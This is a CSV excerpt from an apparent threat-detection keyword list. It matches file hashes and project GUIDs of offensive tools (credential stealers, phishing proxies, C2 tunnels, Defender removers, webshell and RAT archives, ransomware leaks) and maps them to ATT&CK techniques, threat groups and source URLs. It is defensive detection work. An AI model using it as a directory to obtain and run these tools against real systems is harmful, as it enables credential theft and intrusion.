"*A6FF9B59C25CE7EED2D73C5310BCE5E57071601D3F61E0F9C03715FEE99A1085*",".{0,1000}A6FF9B59C25CE7EED2D73C5310BCE5E57071601D3F61E0F9C03715FEE99A1085.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","32645"
"*a70756f3fce0b8fbc9bfbdb422b9ef10f83e4e9020b7dca8e691eb51ff89949c*",".{0,1000}a70756f3fce0b8fbc9bfbdb422b9ef10f83e4e9020b7dca8e691eb51ff89949c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32648"
"*a70c8c13e7173e19cb3aa035297921d69b0de0b6b495e052258e143ec7efed03*",".{0,1000}a70c8c13e7173e19cb3aa035297921d69b0de0b6b495e052258e143ec7efed03.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","0","#filehash","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","32649"
"*a712ea7de1e93b1e8cf780d6e0d042fcf5e277171f6cccfa5d48e20a48a2ac16*",".{0,1000}a712ea7de1e93b1e8cf780d6e0d042fcf5e277171f6cccfa5d48e20a48a2ac16.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","32650"
"*a714b3a2ea1103e9571476a2d6c2a2063938782d5b2f362b19854572551ec6f8*",".{0,1000}a714b3a2ea1103e9571476a2d6c2a2063938782d5b2f362b19854572551ec6f8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32651"
"*a71a8916d6a82bcd0d80cc8150699754abdd4c165773438b9ed39515372a4ec8*",".{0,1000}a71a8916d6a82bcd0d80cc8150699754abdd4c165773438b9ed39515372a4ec8.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","32652"
"*a71ca78d1c4b0dc8d6c35c883b18034a5b505886cc74fed0003c5e095494b1c8*",".{0,1000}a71ca78d1c4b0dc8d6c35c883b18034a5b505886cc74fed0003c5e095494b1c8.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","32653"
"*A71FCCEB-C1C5-4ADB-A949-462B653C2937*",".{0,1000}A71FCCEB\-C1C5\-4ADB\-A949\-462B653C2937.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","32655"
"*a7287ab77d0fca96bdc4dc3df6c699923c559f6270f3d895b176b6623dcdacd9*",".{0,1000}a7287ab77d0fca96bdc4dc3df6c699923c559f6270f3d895b176b6623dcdacd9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32657"
"*A7397316-0AEF-4379-B285-C276DE02BDE1*",".{0,1000}A7397316\-0AEF\-4379\-B285\-C276DE02BDE1.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#GUIDproject","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","32659"
"*a744ea58259da195e1ba7b7af5215656622649f2ddab02e66e9794b7770efaf4*",".{0,1000}a744ea58259da195e1ba7b7af5215656622649f2ddab02e66e9794b7770efaf4.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32663"
"*a74524600479028cf1f6231ddfa1e701c98f333667461a3b20124ee3b36bd650*",".{0,1000}a74524600479028cf1f6231ddfa1e701c98f333667461a3b20124ee3b36bd650.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","32664"
"*a7469955bff5e489d2270d9b389064e1*",".{0,1000}a7469955bff5e489d2270d9b389064e1.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","N/A","10","","N/A","","","","32665"
"*a749e86de5d9f621605a3ca4c2e57a90a03e40fae39b1bcd2025116c0e228962*",".{0,1000}a749e86de5d9f621605a3ca4c2e57a90a03e40fae39b1bcd2025116c0e228962.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32667"
"*a74bc97d32a17a7c5a401229100635b8aee9907da5b6e6c6641ae6af9a81b7f2*",".{0,1000}a74bc97d32a17a7c5a401229100635b8aee9907da5b6e6c6641ae6af9a81b7f2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32668"
"*a74c869d811226c39ec9a3889bf9f017068baa0f69cf855ffdcc34b601777e04*",".{0,1000}a74c869d811226c39ec9a3889bf9f017068baa0f69cf855ffdcc34b601777e04.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32670"
"*a74de3599c61edef0e96fa489513449bfeb2fd46dc4cb7d1af3c22c15ae0554b*",".{0,1000}a74de3599c61edef0e96fa489513449bfeb2fd46dc4cb7d1af3c22c15ae0554b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32671"
"*a756ddc08156eddb07bdddea3cc3c75748f854e4c0388e90b17017fc55bc02b6*",".{0,1000}a756ddc08156eddb07bdddea3cc3c75748f854e4c0388e90b17017fc55bc02b6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32672"
"*a757785e20597ffb527b7a2a1c79254ff082c30b700a2530ad9b5c40db15f5ac*",".{0,1000}a757785e20597ffb527b7a2a1c79254ff082c30b700a2530ad9b5c40db15f5ac.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32673"
"*a759d0c0f5f52fe8512a7cc81191c309f7bed4f65b8ff739d51dabf6ba5b896f*",".{0,1000}a759d0c0f5f52fe8512a7cc81191c309f7bed4f65b8ff739d51dabf6ba5b896f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32674"
"*a75a1abcf2235c58fdcd4a6dd7c7347eeec4a094696c255bc8d45026d2c94e6c*",".{0,1000}a75a1abcf2235c58fdcd4a6dd7c7347eeec4a094696c255bc8d45026d2c94e6c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","32676"
"*a75c79d0fbcc1c76214625d2924fa60e2c74bf8b4b40bf191a1f68a4b28e748d*",".{0,1000}a75c79d0fbcc1c76214625d2924fa60e2c74bf8b4b40bf191a1f68a4b28e748d.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","32677"
"*a760cde750a65dd7e7ea970c57f662c91c7614d33d69b4720ea630db4961ff1e*",".{0,1000}a760cde750a65dd7e7ea970c57f662c91c7614d33d69b4720ea630db4961ff1e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","32678"
"*a771136ec4681f7b160ec60642134a43b79c4da8e04e787371978b1bcb3e02cb*",".{0,1000}a771136ec4681f7b160ec60642134a43b79c4da8e04e787371978b1bcb3e02cb.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32680"
"*a77a13a5a04bd0753a883fbefab58bc0504cd151303e285bb3799d6c38196a30*",".{0,1000}a77a13a5a04bd0753a883fbefab58bc0504cd151303e285bb3799d6c38196a30.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","32681"
"*a77ae629a1c7ca5f0be0d4d4edfd2198914db2ff2963ae1f66bbc87fd0b5a4bf*",".{0,1000}a77ae629a1c7ca5f0be0d4d4edfd2198914db2ff2963ae1f66bbc87fd0b5a4bf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32682"
"*a77af4413613ff9991001e8e86f5409352de6c6c9994d467c5c84e587ae3695e*",".{0,1000}a77af4413613ff9991001e8e86f5409352de6c6c9994d467c5c84e587ae3695e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32683"
"*a785efdc2a95072fe9caece4fd872ae1f543777b60cce590a847180c3926a9b2*",".{0,1000}a785efdc2a95072fe9caece4fd872ae1f543777b60cce590a847180c3926a9b2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32685"
"*a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4*",".{0,1000}a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","#filehash","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","32686"
"*a78b41d1e1383a0aefbaba58881d1aa5b4a76457828ab5d60cb3b10ab075ca49*",".{0,1000}a78b41d1e1383a0aefbaba58881d1aa5b4a76457828ab5d60cb3b10ab075ca49.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","32687"
"*a78d737f30e03d166d4e3e3b2dca71d54f1cbf582206dfe16a1e717ce3dc0ef7*",".{0,1000}a78d737f30e03d166d4e3e3b2dca71d54f1cbf582206dfe16a1e717ce3dc0ef7.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","#filehash","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","32688"
"*a78f78fa018f18e2f95f4b535ab7fe78c5387242ecca1fcff674ca87140ad367*",".{0,1000}a78f78fa018f18e2f95f4b535ab7fe78c5387242ecca1fcff674ca87140ad367.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","32689"
"*a7901b1d6e2081a5cf79150190a4d53f441295a803ac78787591450281de04da*",".{0,1000}a7901b1d6e2081a5cf79150190a4d53f441295a803ac78787591450281de04da.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","32690"
"*a79765b3ea99f275733ff0d9860658a403469ff3e7cb25e52a58f9d2c79e89f4*",".{0,1000}a79765b3ea99f275733ff0d9860658a403469ff3e7cb25e52a58f9d2c79e89f4.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32692"
"*a79e0e65a3c5cabbc86bbdf3ff63f512885e1c35b24f4b648ffa3e3d3cb30a64*",".{0,1000}a79e0e65a3c5cabbc86bbdf3ff63f512885e1c35b24f4b648ffa3e3d3cb30a64.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32695"
"*a7a1bc83f94696c2ef637e12c28afd5f5cbb8f7d0cf22cb41921d77b6c39a721*",".{0,1000}a7a1bc83f94696c2ef637e12c28afd5f5cbb8f7d0cf22cb41921d77b6c39a721.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","32696"
"*a7a5c912263b0207145bd9c2397a4fa338ec82217df2ab83471bb884e473cc9e*",".{0,1000}a7a5c912263b0207145bd9c2397a4fa338ec82217df2ab83471bb884e473cc9e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","32698"
"*a7aa95075ecb1e4b2201ac1962eac88639e816ebf94c0d08b2bd5da274a981db*",".{0,1000}a7aa95075ecb1e4b2201ac1962eac88639e816ebf94c0d08b2bd5da274a981db.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","32700"
"*a7ab668cab3a63df4a03cc53c46eed13fbb13bf1*",".{0,1000}a7ab668cab3a63df4a03cc53c46eed13fbb13bf1.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","32701"
"*a7accf6149a294089b3a2220d4ba48e567a31f4af6d8b4b8654ba90bae93895a*",".{0,1000}a7accf6149a294089b3a2220d4ba48e567a31f4af6d8b4b8654ba90bae93895a.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","32702"
"*A7AD39B5-9BA1-48A9-B928-CA25FDD8F31F*",".{0,1000}A7AD39B5\-9BA1\-48A9\-B928\-CA25FDD8F31F.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","#GUIDproject","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","32703"
"*a7ae058a146daaf19862116d437757417d05ea628e902bb3e7bcd6611f637086*",".{0,1000}a7ae058a146daaf19862116d437757417d05ea628e902bb3e7bcd6611f637086.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","32704"
"*a7b5310c9d38f7242e05c42276f3f8cfd3724ce9ba8fe7ee13bbf22e5b1f9092*",".{0,1000}a7b5310c9d38f7242e05c42276f3f8cfd3724ce9ba8fe7ee13bbf22e5b1f9092.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32705"
"*a7c0d88a6a39881381ba63b7061a03dcd7ebd2dc83cc7d6af914140c559f3e27*",".{0,1000}a7c0d88a6a39881381ba63b7061a03dcd7ebd2dc83cc7d6af914140c559f3e27.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32707"
"*a7c1eba0aa510794924988b65a5965df2452a5960721bcdaf464d07bd693cbfb*",".{0,1000}a7c1eba0aa510794924988b65a5965df2452a5960721bcdaf464d07bd693cbfb.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32708"
"*a7c21a6267ae3fe1b9293c3c2d0080de4a994b8ddc7aca048d906a109a17dfea*",".{0,1000}a7c21a6267ae3fe1b9293c3c2d0080de4a994b8ddc7aca048d906a109a17dfea.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32709"
